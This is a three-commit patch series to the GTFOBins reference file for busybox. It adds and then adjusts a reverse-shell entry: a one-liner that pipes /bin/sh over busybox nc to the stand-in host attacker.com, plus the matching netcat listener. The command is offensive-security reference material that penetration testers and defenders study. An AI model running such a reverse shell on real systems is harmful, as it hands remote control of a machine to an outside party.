From 7240141fd84de5f10412a7247c55a03132ca269f Mon Sep 17 00:00:00 2001 From: astor9 <20415197+astor9@users.noreply.github.com> Date: Thu, 20 Jul 2023 20:51:44 +0200 Subject: [PATCH 1/3] Added reverse shell functionality to busybox if busybox nc is available --- _gtfobins/busybox.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 1893a7f5..1fb87a92 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -21,4 +21,10 @@ functions: code: "./busybox sh" sudo: - code: sudo busybox sh + reverse-shell: + - description: Run `nc -lvp 4444` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=4444 + busybox nc $RHOST $RPORT -e /bin/sh --- From 6daf135e3896c21789ae0072ad1cac40287b28f2 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 12:59:28 +0100 Subject: [PATCH 2/3] Fixup --- _gtfobins/busybox.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 1fb87a92..65d8be7b 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -22,9 +22,9 @@ functions: sudo: - code: sudo busybox sh reverse-shell: - - description: Run `nc -lvp 4444` on the attacker box to receive the shell. + - description: Run `nc -lvp 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com - RPORT=4444 - busybox nc $RHOST $RPORT -e /bin/sh + RPORT=12345 + busybox nc -e /bin/sh $RHOST $RPORT --- From 623ead329f8af39e5e7afc13f85dcb37bcb09129 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sat, 23 Dec 2023 13:02:25 +0100 Subject: [PATCH 3/3] Fixup --- _gtfobins/busybox.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/busybox.md b/_gtfobins/busybox.md index 65d8be7b..e90d03a0 100644 --- a/_gtfobins/busybox.md +++ b/_gtfobins/busybox.md @@ -22,7 +22,7 @@ functions: sudo: - code: sudo busybox sh reverse-shell: - - description: Run `nc -lvp 12345` on the attacker box to receive the shell. + - description: Run `nc -lvp 12345` on the attacker box to receive the shell. code: | RHOST=attacker.com RPORT=12345